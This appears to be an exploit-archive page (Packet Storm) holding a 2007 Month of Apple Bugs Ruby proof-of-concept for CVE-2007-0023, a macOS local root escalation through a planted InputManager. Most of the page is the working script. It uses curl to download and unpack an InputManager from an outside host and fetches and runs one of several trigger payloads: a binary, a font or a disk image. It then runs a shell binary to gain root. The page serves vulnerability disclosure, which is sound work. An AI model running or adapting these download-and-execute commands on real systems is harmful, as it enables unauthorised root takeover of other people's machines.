exploit the possibilities

MOAB-22-01-2007.rb.txt

MOAB-22-01-2007.rb.txt
Posted Jan 24, 2007
Authored by Kevin Finisterre, LMH | Site projects.info-pull.com

Month of Apple Bugs - InputManager provided by the user. Code within the input manager will run under wheel privileges. In combination with diskutil and a wheel-writable setuid binary, this allows unprivileged users to gain root privileges. This is the proof of concept exploit that demonstrates this vulnerability.

tags | exploit, root, proof of concept
systems | apple
advisories | CVE-2007-0023
MD5 | 0822f8f385381a6dada4f24b194e032f

MOAB-22-01-2007.rb.txt

Change Mirror Download
#!/usr/bin/ruby
# Copyright (c) 2007 Kevin Finisterre <kf_lists [at] digitalmunition.com>
# Lance M. Havok <lmh [at] info-pull.com>
# All pwnage reserved.
#
# "Exploit" for MOAB-22-01-2007: All your crash are belong to us.
#

require 'fileutils'

bugselected = (ARGV[0] || 0).to_i

INPUTMANAGER_URL = "http://projects.info-pull.com/moab/bug-files/MOAB-22-01-2007_im.tar.gz"
INPUTMANAGER_PLANT = "/usr/bin/curl -o /tmp/moab_im.tar.gz #{INPUTMANAGER_URL};" +
"mkdir -p ~/Library/InputManagers/;" +
"cd ~/Library/InputManagers/;" +
"tar -zxvf /tmp/moab_im.tar.gz"

case bugselected
when 0
target_url = "http://projects.info-pull.com/moab/bug-files/notification"
trigger_cmd = "curl -o /tmp/notify #{target_url} ; /tmp/notify &"
when 1
target_url = "http://projects.info-pull.com/moab/bug-files/pwned-ex-814.ttf"
trigger_cmd = "/usr/bin/curl -o /tmp/pwned-ex-814.ttf #{target_url}; open /tmp/pwned-ex-814.ttf"
when 2
target_url = "http://projects.info-pull.com/moab/bug-files/MOAB-10-01-2007.dmg.gz"
trigger_cmd = "/usr/bin/curl -o /tmp/moab_dmg.gz #{target_url}; cd /tmp; gunzip moab_dmg.gz; open MOAB-10-01-2007.dmg"
end

CMD_LINE = "#{INPUTMANAGER_PLANT} ; #{trigger_cmd}"

def escalate()
puts "++ Welcome to Pwndertino..."
system CMD_LINE
sleep 5
system "/Users/Shared/shX"
end

escalate()

Login or Register to add favorites

File Archive:

October 2020

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    25 Files
  • 2
    Oct 2nd
    13 Files
  • 3
    Oct 3rd
    1 Files
  • 4
    Oct 4th
    1 Files
  • 5
    Oct 5th
    15 Files
  • 6
    Oct 6th
    15 Files
  • 7
    Oct 7th
    15 Files
  • 8
    Oct 8th
    11 Files
  • 9
    Oct 9th
    3 Files
  • 10
    Oct 10th
    1 Files
  • 11
    Oct 11th
    1 Files
  • 12
    Oct 12th
    8 Files
  • 13
    Oct 13th
    12 Files
  • 14
    Oct 14th
    23 Files
  • 15
    Oct 15th
    4 Files
  • 16
    Oct 16th
    13 Files
  • 17
    Oct 17th
    1 Files
  • 18
    Oct 18th
    1 Files
  • 19
    Oct 19th
    27 Files
  • 20
    Oct 20th
    41 Files
  • 21
    Oct 21st
    15 Files
  • 22
    Oct 22nd
    0 Files
  • 23
    Oct 23rd
    0 Files
  • 24
    Oct 24th
    0 Files
  • 25
    Oct 25th
    0 Files
  • 26
    Oct 26th
    0 Files
  • 27
    Oct 27th
    0 Files
  • 28
    Oct 28th
    0 Files
  • 29
    Oct 29th
    0 Files
  • 30
    Oct 30th
    0 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close